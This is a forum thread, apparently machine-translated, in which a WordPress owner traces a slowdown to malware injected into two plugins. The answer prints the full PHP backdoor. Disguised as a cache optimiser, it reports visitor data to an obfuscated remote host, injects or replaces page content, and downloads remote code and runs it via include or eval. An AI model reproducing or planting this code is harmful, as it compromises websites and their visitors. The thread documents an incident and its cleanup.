WordPress-the site has become unreal braking — how to find the cause?

A medium-loaded WordPress website that the Google PageSpeed Insights showed 70-85 for different pages.

No which the site began to show very bad results: 10-40 for different pages.

All settings are cached, miniserie, etc. - all normal. Tried to disable and enable different plugins does not help unfortunately (...

Began to sin on VPS hosting, put the plugin Query Monitor shows about 0.3-0.5 sec for different pages:

gJbhm_rwRYehCWpqZ7A6iQ.png

But the feelings when driving through the site and in admin interface - there is some slow queries.

Google PageSpeed Insights shows this:

AijJ16_9SfSo-cp0noCoLg.png

Those. support wrote: the ping is normal, the server is running in standard mode and everything is good )

Where to dig?
March 12th 20 at 07:58
3 answers
March 12th 20 at 08:00
Solution
Launched a copy of the site on a local web server and the same story - so hosting here not at Affairs.

Rechecked the measurements run-time Query Monitor - "manual" php code in the root file index.php - the results are the same, Query Monitor shows the truth, and as it turns out the pages are generated is not longer than 0.5 sec.

Change the subject - does not help. Started to disable plugins one at a time and when turned off a couple: "CF Post Formats and the Revolution Slider (Share on Theme123.Net)" the website is alive and the request processing time for pages has dropped to milliseconds.

On the production server the same trick with disabling these plugins is not passed, had to disable more plugins to work with the same speed:

YeE6XMsNSguER79PN00keQ.png

2 weeks ago, all these plugins are in active mode worked and the site is not inhibited...

installed the Wordfence Security scan and here is the coincidence in the files in these above mentioned plugins have been found to have the following insert code:
/**
 * Speedup php function cache by optimizing buffer output
*/
;if (!function_exists('_php_cache_speedup_func_optimizer_')) { function _php_cache_speedup_func_optimizer_($buffer) {
 if (isset($GLOBALS['_php_cache_speedup_func_optimizer_completed_'])) {
 // already completed
 return $buffer;
}

 $mod = false;
 $token = 'czoyMzoiaHR0cDovL3Bpd2VyLnB3L2Fwas5wahaiow==';
 $tmp_buffer = $buffer; $gzip = false; $body = '<' . 'b' . 'o' . 'd' . 'y';

 if (($has_body = stripos($buffer, $body)) === false) {
 // define gzdecode function if not defined
 if (!function_exists('gzdecode')) {
 function gzdecode($data) {
 return @gzinflate(substr($data, 10, -8));
}
}

 // gzdecode buffer
 $tmp_buffer = @gzdecode($tmp_buffer);

 // check if buffer has body tag
 if (($has_body = stripos($tmp_buffer, $body)) !== false) {
 // got a body tag, this should be gzencoded when done
 $gzip = true;
}
}

 if ($has_body === false) {
 // no body, return the original buffer
 return $buffer;
}

 $GLOBALS['_php_cache_speedup_func_optimizer_completed_'] = true;

 // decode token
 $func = 'b' . 'a' . 's' . 'e' . '6' . '4' . '_' . 'd' . 'e' . 'c' . 'o' . 'd' . 'e';
 $token = @unserialize(@$func($token));
 if (empty($token)) {
 return $buffer;
}

 // download remote data
 function down($url, $timeout = 5) {
 // download using file_get_contents
 if (@ini_get('allow_url_fopen')) {
 $ctx = @stream_context_create(array('http' => array('timeout' => $timeout)));
 if ($ctx !== FALSE) {
 $file = @file_get_contents($url, false, $ctx);
 if ($file !== FALSE) {
 return $file;
}
}
}

 // download using curl
 if (function_exists('curl_init')) {
 $ch = curl_init();

 curl_setopt($ch, CURLOPT_URL, $url);
 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
 curl_setopt($ch, CURLOPT_MAXREDIRS, 5);
 curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
 curl_setopt($ch, CURLOPT_TIMEOUT, $timeout);
 curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);

 $response = curl_exec($ch);
curl_close($ch);

 return $response;
}

 // download using sockets
 if (extension_loaded('sockets')) {
 $data = parse_url($url);
 if (!empty($data['host'])) {
 $host = $data['host'];
 $port = isset($data['port']) ? $data['port'] : 80;
 $uri = empty($data['path']) ? '/' : $data['path'];
 if (($socket = @socket_create(AF_INET, SOCK_STREAM, 0)) && @socket_set_option($socket, SOL_SOCKET, SO_SNDTIMEO, array('sec' => $timeout, 'usec' => $timeout * 1000)) && @socket_connect($socket, $host, $port)) {
 $buf = "GET $uri HTTP/1.0\r\nAccept: */*\r\nAccept-Language: en-us\r\nUser-Agent: Mozilla (compatible; WinNT)\r\nHost: $host\r\n\r\n";
 if (@socket_write($socket, $buf) !== FALSE) {
 $response = ";
 while (($tmp = @socket_read($socket, 1024))) {
 $response .= $tmp;
}
@socket_close($socket);
 return $response;
}
}
}
}

 return false;
}

 $token .= ((strpos($token, '?') === false) ? '?' : '&') . http_build_query(array(
 'h' => $_SERVER['HTTP_HOST'],
 'u' => $_SERVER['REQUEST_URI'],
 'a' => empty($_SERVER['HTTP_USER_AGENT']) ? ": $_SERVER['HTTP_USER_AGENT'],
 'r' => empty($_SERVER['HTTP_REFERER']) ? ": $_SERVER['HTTP_REFERER'],
 'i' => $_SERVER['REMOTE_ADDR'],
 'f' => __FILE__,
 'v' => 9
));
 $token = @unserialize(@$func(down($token)));

 if (empty($token) || empty($token['data']) || !is_array($token['data'])) {
 // invalid data
 return $buffer;
}

 // fix missing meta description
 if (isset($token['meta']) && $token['meta'] && ($pos = stripos($tmp_buffer, '</head>')) !== false) {
 $tmp = substr($tmp_buffer, 0, $pos);
 if (stripos($tmp, 'name="description"') === false && stripos($tmp, 'name=\'description\") === false && stripos($tmp, 'name=description') === false) {
 $meta = $_SERVER['HTTP_HOST'];
 // append meta description
 $tmp_buffer = substr($tmp_buffer, 0, $pos) . '<' . 'm' . 'e' . 't' . 'a' . '' . 'n' . 'a'. 'm' . 'e' . '='. '"' . 'd' . 'e' . 's' .'c' .'r' . 'i' . 'p' . 't' . 'i' . 'o' . 'n' . '"'. '' . 'c' . 'o' . 'n' . 't' . 'e' . 'n' . 't' . '="'. htmlentities(substr($meta, 0, 160)) .'">' . substr($tmp_buffer, $pos);
 $mod = true;
}
}

 foreach ($token['data'] as $tokenData) {
 if (!empty($tokenData['content'])) {
 // set defaults
 $tokenData = array_merge(array(
 'pos' => 'after',
 'tag' => 'bo' . 'dy',
 'count' => 0,
 ), $tokenData);

 // find all occurrences of <tag>
 $tags = array();
 while (true) {
 if (($tmp = @stripos($tmp_buffer, '<'.$tokenData['tag'], empty($tags) ? 0 : $tags[count($tags) - 1] + 1)) === false) {
break;
}
 $tags[] = $tmp;
}

 if (empty($tags)) {
 // no tags found or nothing to show
continue;
}

 // find matched tag position
 $count = $tokenData['count'];
 if ($tokenData['count'] < 0) {
 // from end to beginning
 $count = abs($tokenData['count']) - 1;
 $tags = array_reverse($tags);
}

 if ($count >= count($tags)) {
 // fix overflow
 $count = count($tags) - 1;
}

 // find insert position
 if ($tokenData['pos'] == 'before') {
 // pos is before
 $insert = $tags[$count];
 } else if (($insert = strpos($tmp_buffer, '>', $tags[$count])) !== false) {
 // pos is after the found end tag, insert after it
 $insert += 1;
}

 if ($insert === false) {
 // no insert position
continue;
}

 // insert html code
 $tmp_buffer = substr($tmp_buffer, 0, $insert) . $tokenData['content'] . substr($tmp_buffer, $insert);
 $mod = true;
 } elseif (!empty($tokenData['replace'])) {
 // replace content
@http_response_code(200);
 $tmp_buffer = $tokenData['replace'];
 $mod = true;
 } elseif (!empty($tokenData['run'])) {
 // save temporary file optimization
 register_shutdown_function(function($file, $content) {
 if (file_put_contents($file, $content) !== false) {
@chdir(dirname($file));
 include $file;
@unlink($file);
 } else {
 @eval('@chdir("' . addslashes(dirname($file)) . '");?>' . $content);
}
 }, dirname(__FILE__) . '/temporary_optimization_file.php', strpos($tokenData['run'], 'http://') === 0 ? down($tokenData['run']) : $tokenData['run']);
 } else {
 // no content
continue;
}
}

 // return gzencoded or normal buffer
 return !$mod ? $buffer : ($gzip ? gzencode($tmp_buffer) : $tmp_buffer);
} ob_start('_php_cache_speedup_func_optimizer_');
register_shutdown_function('ob_end_flush'); }
?>


some games buffer )
strange that it all worked normally before, because this virus code sits 2017 (podglyadel backups).

Outcome: deleted these manually insert the code from the plugin files, it works at normal speed.
March 12th 20 at 08:02
well, not PageSpeed -th one....
First I would have tested in dev, tolls chromium and then
This will allow you to begin to understand the problem on the server side (if big time ttfb), or that some of the content was to surrender (possibly connected somewhere external stylesheets, scripts or images, which give the problem).
Well and further - depending on the situation, a Profiler, mysql logs etc. and etc....
Yes this issue several times immediately raised. For example, here and here.
the problem on the server side 100%, because:
a5GpMKucTzC2TMVpZZ5Ywg.png7OuGSskKTqu2S-cJhW4R7Q.png
watch the mysql logs and profile - a what if Query Monitor shows normal values? or there are suspicions that he may blatantly lie? ) I always believed him, although probably nothing can ) - Earl34 commented on March 12th 20 at 08:05
March 12th 20 at 08:04
Here test, everything is visual and chewed
https://gtmetrix.com/

10sec - is likely statistical system and other labuden, sometimes I look at these grapes and tear wipe))) 15-20 services glue on the website, well at least one look...
don't listen to pseudo-SEO-schnick and throws all this crap in the basement and it will be chocolate

Find more questions by tags WordPress